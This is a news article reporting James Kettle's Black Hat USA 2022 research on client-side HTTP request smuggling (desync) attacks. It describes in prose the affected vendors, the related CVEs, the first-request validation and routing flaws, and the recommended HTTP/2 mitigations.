New HTTP Request Smuggling Attacks Target Web Browsers
Threat actors can abuse weaknesses in HTTP request handling to launch damaging browser-based attacks on website users, researcher says.
August 11, 2022
BLACK HAT USA – LAS VEGAS – A security researcher who previously demonstrated how attackers can abuse weaknesses in the way websites handle HTTP requests warned that the same issues can be used in damaging browser-based attacks against users.
James Kettle, director of PortSwigger, described his research as shedding new light on so-called desync attacks that exploit disagreements in how a website's back-end and front-end servers interpret HTTP requests. Previously, at Black Hat USA 2019, Kettle showed how attackers could trigger these disagreements — over things like message length, for instance — to route HTTP requests to a back-end component of their choice, steal credentials, and invoke unexpected responses from an application and other malicious actions. Kettle also has previously shown how HTTP/2 implementation errors can put websites at risk of compromise.
Kettle's new research focuses on how threat actors can exploit the same improper HTTP request handling issues to also attack website users and steal credentials, install backdoors, and compromise their systems in other ways. Kettle said he had identified HTTP handling anomalies that enabled such client-side desync attacks on sites such as Amazon.com, those using the AWS Application Load Balancer, Cisco ASA WebVPN, Akamai, Varnish Cache servers, and Apache HTTP Server 2.4.52 and earlier.
The main difference between server-side desync attacks and client-side desync is that the former requires attacker-controlled systems with a reverse proxy front end and at least partly malformed requests, Kettle said in a conversation with Dark Reading following his presentation. A browser-powered attack takes place within the victim's Web browser, using legitimate requests, he said. Kettle showed a proof-of-concept where he was able to store information such as authentication tokens of random users on Amazon in his shopping list as an example of what an attacker would be able to do. Kettle discovered he could have gotten each infected victim on Amazon's site to relaunch the attack to others.
"This would have released a desync worm — a self-replicating attack which exploits victims to infect others with no user interaction, rapidly exploiting every active user on Amazon," Kettle said. Amazon has since fixed the issue.
Cisco opened a CVE for the vulnerability (CVE-2022-20713) after Kettle informed the company about it and described the issue as allowing an unauthenticated, remote attacker to conduct browser-based attacks on website users. "An attacker could exploit this vulnerability by convincing a targeted user to visit a website that can pass malicious requests to an ASA device that has the Clientless SSL VPN feature enabled," the company noted. "A successful exploit could allow the attacker to conduct browser-based attacks, including cross-site scripting attacks, against the targeted user."
Apache identified its HTTP request smuggling vulnerability (CVE-2022-22720) as tied to a failure "to close inbound connection when errors are encountered discarding the request body." Varnish described its vulnerability (CVE-2022-23959) as allowing attackers to inject spurious responses on client connections.
In a whitepaper released today, Kettle said there were two separate scenarios where HTTP handling anomalies could have security implications,
One was first-request validation, where front-end servers that handle HTTP requests use the Host header to identify which back-end component to route each request to. These proxy servers often have a whitelist of hosts that people are allowed to access. What Kettle discovered was that some front-end or proxy servers only use the whitelist for the first request sent over a connection and not for subsequent requests sent over the same connection. So, attackers can abuse this to gain access to a target component by first sending a request to an allowed destination and then following up with a request to their target destination.
Another closely related but far more frequent issue that Kettle encountered stemmed from first-request routing. With first-request routing, the front-end or proxy server looks at the HTTP request's Host header to decide where to route the request to and then routes all subsequent requests from the client down to the same back end. In environments where the Host header is handled in an unsafe way, this presents attackers with an opportunity to target any back-end component to carry out a variety of attacks, Kettle said.
The best way for websites to mitigate client-side desync attacks is to use HTTP/2 end-to-end, Kettle said. It's generally not a good idea to have a front end that supports HTTP/2 and a back end that is HTTP/1.1. "If your company routes employee's traffic through a forward proxy, ensure upstream HTTP/2 is supported and enabled," Kettle advised. "Please note that the use of forward proxies also introduces a range of extra request-smuggling risks beyond the scope of this paper."
Read more about:
Black Hat NewsAbout the Author
You May Also Like